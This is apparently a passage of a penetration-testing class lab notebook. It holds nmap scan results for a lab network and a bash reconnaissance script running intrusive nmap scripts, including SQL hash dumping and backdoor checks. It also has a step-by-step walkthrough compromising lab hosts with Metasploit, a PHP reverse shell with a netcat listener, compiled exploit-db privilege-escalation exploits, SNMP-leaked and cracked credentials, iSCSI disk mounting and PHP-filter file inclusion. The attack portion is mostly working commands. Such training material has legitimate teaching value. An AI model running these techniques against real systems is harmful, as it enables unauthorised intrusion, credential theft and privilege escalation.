2888. Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
2889. Nmap scan report for 172.31.2.11
2890. Host is up (0.087s latency).
2891. Not shown: 995 filtered ports
2892. PORT STATE SERVICE VERSION
2893. 21/tcp open ftp FreeFloat ftpd 1.00
2894. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
2895. 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
2896. 3389/tcp open ms-wbt-server Microsoft Terminal Service
2897. 9999/tcp open abyss?
2898. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
2899.  
2900. Nmap scan report for 172.31.2.14
2901. Host is up (0.087s latency).
2902. Not shown: 995 filtered ports
2903. PORT STATE SERVICE VERSION
2904. 21/tcp open ftp FreeFloat ftpd 1.00
2905. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
2906. 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
2907. 3389/tcp open ms-wbt-server Microsoft Terminal Service
2908. 9999/tcp open abyss?
2909. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
2910.  
2911. Nmap scan report for 172.31.2.47
2912. Host is up (0.087s latency).
2913. Not shown: 998 closed ports
2914. PORT STATE SERVICE VERSION
2915. 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
2916. 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
2917. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2918.  
2919. Nmap scan report for 172.31.2.64
2920. Host is up (0.087s latency).
2921. Not shown: 997 closed ports
2922. PORT STATE SERVICE VERSION
2923. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
2924. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
2925. 6667/tcp open irc ngircd
2926. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
2927.  
2928. Nmap scan report for 172.31.2.86
2929. Host is up (0.087s latency).
2930. Not shown: 989 closed ports
2931. PORT STATE SERVICE VERSION
2932. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
2933. 53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
2934. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
2935. 110/tcp open pop3 Dovecot pop3d
2936. 111/tcp open rpcbind 2-4 (RPC #100000)
2937. 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2938. 143/tcp open imap Dovecot imapd (Ubuntu)
2939. 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2940. 993/tcp open ssl/imap Dovecot imapd (Ubuntu)
2941. 995/tcp open ssl/pop3 Dovecot pop3d
2942. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
2943. Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
2944.  
2945. Nmap scan report for 172.31.2.117
2946. Host is up (0.086s latency).
2947. Not shown: 997 closed ports
2948. PORT STATE SERVICE VERSION
2949. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
2950. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
2951. 2020/tcp open ftp vsftpd 2.0.8 or later
2952. Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
2953.  
2954. Nmap scan report for 172.31.2.157
2955. Host is up (0.086s latency).
2956. Not shown: 997 closed ports
2957. PORT STATE SERVICE VERSION
2958. 21/tcp open ftp vsftpd 2.0.8 or later
2959. 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
2960. 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
2961.  
2962. Nmap scan report for 172.31.2.217
2963. Host is up (0.087s latency).
2964. Not shown: 997 closed ports
2965. PORT STATE SERVICE VERSION
2966. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
2967. 80/tcp open http nginx
2968. 3260/tcp open iscsi?
2969. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2970.  
2971. Nmap scan report for 172.31.2.238
2972. Host is up (0.087s latency).
2973. Not shown: 997 closed ports
2974. PORT STATE SERVICE VERSION
2975. 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
2976. 80/tcp open http nginx 1.6.2
2977. 6969/tcp open acmsoda?
2978. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2979.  
2980. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2981. Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
2982.  
2983.  
2984.  
2985.  
2986.  
2987.  
2988.  
2989. -----------------------------------------------------------------------------------------------------------------------------
2990. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2991. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2992. --------------------------------------------------------------------------------------
2993.  
2994. #!/bin/bash
2995.  
2996. # Script made during the CyberWar class for the students to play with, debug, and improve.
2997. # Take a look at the following websites for ideas:
2998. # https://github.com/commonexploits/port-scan-automation
2999. # https://www.commonexploits.com/penetration-testing-scripts/
3000. # https://github.com/averagesecurityguy/scripts
3001. # https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3002.  
3003.  
3004.  
3005. # Some thoughts of things to add to this script:
3006. # Shodan queries (API key)
3007. # AWS scanning (need credentials)
3008. # Jenkins scanning
3009. # Active Directory enumeration
3010. # Github scanning (API key required)
3011. # Blockchain platforms
3012.  
3013.  
3014.  
3015.  
3016.  
3017.  
3018.  
3019. #############################################
3020. # Check to see if script is running as root #
3021. #############################################
3022. if [ "$EUID" -ne 0 ]
3023. then echo "Please run as root"
3024. exit
3025. fi
3026.  
3027.  
3028. ####################################
3029. # Check to see if gcc is installed #
3030. ####################################
3031. file1="/usr/bin/gcc"
3032. if [ -f "$file1" ]
3033. then
3034. echo "$file is installed."
3035. clear
3036. else
3037. echo "$file not found."
3038. echo Installing gcc
3039. apt-get install -y gcc
3040. clear
3041. fi
3042.  
3043. ########################
3044. # Make the directories #
3045. ########################
3046. cd /tmp
3047. rm -rf customerAudit/
3048. rm -rf NetworkAudit/
3049. mkdir -p /tmp/NetworkAudit/discovered_services/
3050. mkdir -p /tmp/NetworkAudit/scan/windows/
3051. mkdir -p /tmp/NetworkAudit/scan/sunrpc/
3052. mkdir -p /tmp/NetworkAudit/scan/ssh/
3053. mkdir -p /tmp/NetworkAudit/scan/ftp/
3054. mkdir -p /tmp/NetworkAudit/scan/http/
3055. mkdir -p /tmp/NetworkAudit/scan/telnet/
3056. mkdir -p /tmp/NetworkAudit/scan/pop3/
3057. mkdir -p /tmp/NetworkAudit/scan/printers/
3058. mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
3059. mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
3060. mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
3061. mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
3062.  
3063.  
3064. #####################
3065. # Download propecia #
3066. #####################
3067. file2="/bin/propecia"
3068. if [ -f "$file2" ]
3069. then
3070. echo "$file is installed."
3071. clear
3072. else
3073. echo "$file not found."
3074. echo Installing propecia
3075. cd /tmp
3076. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
3077. gcc propecia.c -o propecia
3078. cp propecia /bin
3079. fi
3080.  
3081. ######################
3082. # Find Windows Hosts #
3083. ######################
3084. clear
3085. echo "Scanning for windows hosts."
3086. propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
3087. clear
3088. echo "Done scanning for windows hosts. FTP is next."
3089.  
3090.  
3091. ##################
3092. # Find FTP Hosts #
3093. ##################
3094. echo "Scanning for hosts running FTP."
3095. propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
3096. clear
3097. echo "Done scanning for FTP hosts. SSH is next."
3098.  
3099. ##################
3100. # Find SSH Hosts #
3101. ##################
3102. echo "Scanning for hosts running SSH."
3103. propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
3104. clear
3105. echo "Done scanning for SSH hosts. POP3 is next."
3106.  
3107.  
3108. ###################
3109. # Find POP3 Hosts #
3110. ###################
3111. echo "Scanning for hosts running POP3."
3112. propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
3113. clear
3114. echo "Done scanning for POP3 hosts. SunRPC is next."
3115.  
3116.  
3117. #####################
3118. # Find SunRPC Hosts #
3119. #####################
3120. echo "Scanning for hosts running SunRPC."
3121. propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
3122. clear
3123. echo "Done scanning for SunRPC hosts. Telnet is next."
3124.  
3125.  
3126. #####################
3127. # Find Telnet Hosts #
3128. #####################
3129. echo "Scanning for hosts running Telnet."
3130. propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
3131. clear
3132. echo "Done scanning for Telnet hosts. HTTP is next."
3133.  
3134.  
3135. ###################
3136. # Find HTTP Hosts #
3137. ###################
3138. echo "Scanning for hosts running HTTP"
3139. propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
3140. clear
3141. echo "Done scanning for HTTP hosts. HTTPS hosts are next."
3142.  
3143.  
3144. ###################
3145. # Find HTTPS Hosts #
3146. ###################
3147. echo "Scanning for hosts running HTTP"
3148. propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
3149. clear
3150. echo "Done scanning for HTTPS hosts. Databases are next."
3151.  
3152.  
3153. ##################
3154. # Find Databases #
3155. ##################
3156. echo "Scanning for hosts running MS SQL Server"
3157. propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
3158. clear
3159.  
3160. echo "Scanning for hosts running Oracle"
3161. propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
3162. clear
3163.  
3164. echo "Scanning for hosts running Postgres"
3165. propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
3166. clear
3167.  
3168. echo "Scanning for hosts running MongoDB"
3169. propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
3170. clear
3171.  
3172. echo "Scanning for hosts running MySQL"
3173. propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
3174. clear
3175. echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
3176.  
3177.  
3178. ###############################
3179. # Ok, let's do the NMAP files #
3180. ###############################
3181. clear
3182. # Windows
3183. for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
3184. echo "Done with Windows."
3185.  
3186. clear
3187. # FTP
3188. for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
3189. echo "Done with FTP."
3190.  
3191. clear
3192. # SSH
3193. for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
3194. echo "Done with SSH."
3195.  
3196. clear
3197. # SUNRPC
3198. for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
3199. echo "Done with SunRPC."
3200.  
3201. clear
3202. # POP3
3203. for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg $x > /tmp/NetworkAudit/scan/pop3/$x ; done
3204. echo "Done with POP3."
3205.  
3206. # clear
3207. # HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3208. # as a good reference for what nmap nse scripts to run against port 80 and 443
3209. # for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
3210. # echo "Done with HTTP."
3211.  
3212.  
3213. # clear
3214. # HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3215. # as a good reference for what nmap nse scripts to run against port 80 and 443
3216. # for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
3217. # echo "Done with HTTP."
3218.  
3219.  
3220. clear
3221. # SQL Servers
3222. for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
3223. echo "Done with MS SQL."
3224.  
3225. clear
3226. # Oracle Servers
3227. # FIX THIS: needs brute force wordlists for this to run correctly
3228. # for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
3229. # echo "Done with Oracle."
3230.  
3231. clear
3232. # MongoDB
3233. for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
3234. echo "Done with MongoDB."
3235.  
3236.  
3237. clear
3238. # MySQL Servers
3239. for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
3240. echo "Done with MySQL."
3241.  
3242.  
3243. # Add postgres nse scripts
3244. # References:
3245. # https://nmap.org/nsedoc/lib/pgsql.html
3246. # https://nmap.org/nsedoc/scripts/pgsql-brute.html
3247. #
3248.  
3249. echo " "
3250. echo " "
3251. sleep 1
3252. clear
3253. echo "Done, now check your results."
3254. sleep 2
3255. clear
3256. cd /tmp/NetworkAudit/scan/
3257. ls
3258.  
3259.  
3260.  
3261. ----------------------------------------------------------------------------------------------------------------------------
3262. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3263. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3264. --------------------------------------------------------------------------------------
3265.  
3266. ######################################
3267. ----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
3268. ######################################
3269.  
3270. ######################
3271. # Attacking Minotaur #
3272. ######################
3273.  
3274. Step 1: Portscan/Bannergrab the target host
3275. ---------------------------Type This-----------------------------------
3276. sudo nmap -sV 172.31.2.117
3277. -----------------------------------------------------------------------
3278.  
3279.  
3280.  
3281. Step 2: Vulnerability scan the web server
3282. ---------------------------Type This-----------------------------------
3283. cd /home/hacklab/toolz/Nikto2/program
3284. perl nikto.pl -h 172.31.2.117
3285. -----------------------------------------------------------------------
3286.  
3287.  
3288.  
3289. Step 3: Directory brute-force the webserver
3290. ---------------------------Type This-----------------------------------
3291. cd /home/hacklab/toolz/dirb
3292. ./dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
3293. -----------------------------------------------------------------------
3294.  
3295. ### dirb output ###
3296. ==> DIRECTORY: http://172.31.2.117/bull/
3297. -----------------------------------------------------------------------
3298.  
3299.  
3300. Step 4: Run wordpress vulnerability scanner
3301. ---------------------------Type This-----------------------------------
3302. wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
3303.  
3304.  
3305. cewl -w words.txt http://172.31.2.117/bull/
3306.  
3307.  
3308. cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
3309.  
3310. wc -l whateverbro.txt
3311.  
3312. john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
3313.  
3314. wc -l words-john.txt
3315.  
3316. wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
3317. -----------------------------------------------------------------------
3318.  
3319.  
3320.  
3321.  
3322.  
3323. Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
3324. ---------------------------Type This-----------------------------------
3325. msfconsole
3326.  
3327. use exploit/unix/webapp/wp_slideshowgallery_upload
3328.  
3329. set RHOST 172.31.2.117
3330.  
3331. set RPORT 80
3332.  
3333. set TARGETURI /bull
3334.  
3335. set WP_USER bully
3336.  
3337. set WP_PASSWORD Bighornedbulls
3338.  
3339. exploit
3340. -----------------------------------------------------------------------
3341.  
3342. Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
3343. This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
3344. and then from the lab network attacking other students.
3345.  
3346.  
3347. ---------------------------Type This-----------------------------------
3348. wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
3349.  
3350. tar -zxvf php-reverse-shell-1.0.tar.gz
3351.  
3352. cd ~/toolz/php-reverse-shell-1.0/
3353.  
3354. nano php-reverse-shell.php
3355. -----------------------------------------------------------------------
3356. ***** change the $ip and $port variables to a host that you have already compromised in the network
3357. ***** for this example I chose 172.31.2.64 and kept port 1234
3358.  
3359.  
3360. ---------------------------Type This-----------------------------------
3361. chmod 777 php-reverse-shell.php
3362. cp php-reverse-shell.php ..
3363. -----------------------------------------------------------------------
3364.  
3365.  
3366.  
3367. Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
3368. Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
3369. --------------------------Type This-----------------------------------
3370. python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
3371.  
3372. -----------------------------------------------------------------------
3373.  
3374.  
3375.  
3376. Set up netcat listener on previously compromised host
3377. ---------------------------Type This-----------------------------------
3378. ssh -l webmin 172.31.2.64
3379. webmin1980
3380.  
3381.  
3382. nc -lvp 1234
3383. -----------------------------------------------------------------------
3384.  
3385.  
3386.  
3387.  
3388. ---------------------Type This in your browser ------------------------
3389. http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
3390. -----------------------------------------------------------------------
3391.  
3392.  
3393. Now check your listener to see if you got the connection
3394. ---------------------------Type This-----------------------------------
3395. id
3396.  
3397. /sbin/ifconfig
3398.  
3399. python -c 'import pty;pty.spawn("/bin/bash")'
3400.  
3401. ---------------------------Type This-----------------------------------
3402. cd /tmp
3403. cat >> exploit2.c << out
3404. -----------------------------------------------------------------------
3405. **************paste in the content from here *****************
3406. https://www.exploit-db.com/raw/37292/
3407.  
3408. **************hit enter a few times *****************
3409.  
3410. ---------------------------Type This-----------------------------------
3411. out
3412.  
3413.  
3414. gcc -o boom2 exploit2.c
3415.  
3416. ./boom2
3417.  
3418. id
3419. -----------------------------------------------------------------------
3420.  
3421.  
3422.  
3423.  
3424. ---------------------------Type This-----------------------------------
3425. sudo nmap -sV 172.31.2.181
3426. -----------------------------------------------------------------------
3427. PORT STATE SERVICE VERSION
3428. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
3429.  
3430.  
3431. ---------------------------Type This-----------------------------------
3432. sudo nmap -sU -p69,161 172.31.2.181
3433. -----------------------------------------------------------------------
3434. PORT STATE SERVICE
3435. 69/udp closed tftp
3436. 161/udp open snmp
3437.  
3438.  
3439. ---------------------------Type This-----------------------------------
3440. sudo apt-get -y install onesixtyone snmp
3441.  
3442. wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt
3443.  
3444. onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
3445. ----------------------------------------------------------------------
3446. Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1
3447.  
3448. ---------------------------Type This-----------------------------------
3449. cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt
3450.  
3451. onesixtyone -c snmp-community-strings.txt 172.31.2.181
3452.  
3453. snmpwalk -Os -c public -v 1 172.31.2.181
3454. ---------------------------------------------------------------------
3455.  
3456. Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."
3457.  
3458. Google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.
3459.  
3460. Try to SSH to the box using the credentials eric:therisingsun
3461.  
3462.  
3463. ---------------------------Type This-----------------------------------
3464. ssh -l eric 172.31.2.181
3465. therisingsun
3466.  
3467. id
3468. cat /etc/issue
3469. uname -a
3470. cat /etc/*release
3471.  
3472. ---------------------------Type This-----------------------------------
3473. cat >> exploit.c << out
3474.  
3475. **************paste in the content from here *****************
3476. https://www.exploit-db.com/raw/39166/
3477.  
3478.  
3479. ------ hit enter a few times ------
3480.  
3481. ------ then type 'out' ----- this closes the file handle...
3482.  
3483.  
3484.  
3485. ---------------------------Type This-----------------------------------
3486. gcc -o boom exploit.c
3487.  
3488. ./boom
3489.  
3490. id
3491.  
3492.  
3493. ......YEAH - do the happy dance!!!!
3494.  
3495.  
3496.  
3497. How to go after 172.31.2.238
3498. Reference: https://t0w3ntum.com/2017/01/07/baffle/
3499.  
3500.  
3501. ---------------------------------------------------------------
3502. sudo nmap -sV -p 3260 172.31.2.217
3503.  
3504.  
3505. sudo apt install open-iscsi
3506.  
3507. sudo iscsiadm -m discovery -t st -p 172.31.2.217
3508.  
3509. sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
3510.  
3511. sudo iscsiadm -m node -p 172.31.2.217 --login
3512.  
3513. sudo /bin/bash
3514.  
3515. fdisk -l
3516. ***** look for /dev/sda5 - Linux swap / Solaris *******
3517.  
3518. mkdir /mnt/217vm
3519.  
3520. mount /dev/sdb /mnt/217vm
3521.  
3522. cd /mnt/217vm
3523.  
3524. ls
3525.  
3526. cat flag1.txt
3527.  
3528. file bobsdisk.dsk
3529.  
3530. mkdir /media/bobsdisk
3531.  
3532. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
3533.  
3534. /mnt/217vm# ls
3535.  
3536. cd /media/bobsdisk/
3537.  
3538. ls
3539.  
3540. cat ToAlice.eml
3541.  
3542. file bobsdisk.dsk
3543.  
3544. mkdir /media/bobsdisk
3545.  
3546. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
3547.  
3548. /mnt/217vm# ls
3549.  
3550. cd /media/bobsdisk/
3551.  
3552. ls
3553.  
3554. cat ToAlice.eml
3555.  
3556. file ToAlice.csv.enc
3557.  
3558. file bobsdisk.dsk
3559.  
3560. pwd
3561.  
3562. mkdir /media/bobsdisk
3563.  
3564.  
3565. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
3566.  
3567. ls
3568.  
3569. cd /media/bobsdisk/
3570.  
3571. ls
3572.  
3573. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
3574.  
3575. ls
3576.  
3577. cat ToAlice.eml | grep flag
3578.  
3579. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
3580.  
3581. ls
3582.  
3583. cat ToAlice.eml
3584. ***** look for supercalifragilisticoespialidoso ******
3585.  
3586. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
3587.  
3588. supercalifragilisticoespialidoso
3589.  
3590.  
3591. ls
3592.  
3593. cat ToAlice.csv
3594.  
3595. -----------------------------------------------------
3596. Web Path,Reason
3597. 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
3598. c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
3599. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
3600.  
3601. -----------------------------------------------------
3602.  
3603. The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
3604. http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
3605. -- view source
3606.  
3607. Found this string in the source:
3608. R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
3609. ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
3610. bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
3611. YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
3612. ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
3613. YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
3614. TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
3615. IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
3616. ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
3617. IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
3618.  
3619. ------ https://www.base64decode.org/ -------
3620. ------ Decoded, but didn't find a flag -----
3621.  
3622.  
3623. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
3624. -- view source --
3625. -- Nothing in source --
3626.  
3627. Browsed to the flag link:
3628. view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
3629. -- view source --
3630. -- Nothing in source --
3631.  
3632.  
3633. Tried a PHP base64 decode with the URL:
3634. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
3635. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
3636. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
3637.  
3638. ------ https://www.base64decode.org/ -------
3639. Use the string found here:
3640. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
3641.  
3642. -------------------------------------------------------------------
3643. PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
3644. -------------------------------------------------------------------
3645. <?php
3646. defined ('VIAINDEX') or die('Ooooh! So close..');
3647. ?>
3648. <h1>Flag</h1>
3649. <p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
3650. <img src="trollface.png" />
3651. <?php
3652. // Ok, ok. Here's your flag!
3653. //
3654. // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
3655. //
3656. // Well done, you're doing great so far!
3657. // Next step. SHELL!
3658. //
3659. //
3660. // Oh. That flag above? You're gonna need it...
3661. ?>
3662.  
3663.  
3664.  
3665.  
3666.  
3667. ============================================ Attacking another server because I need a reverse shell =========================================
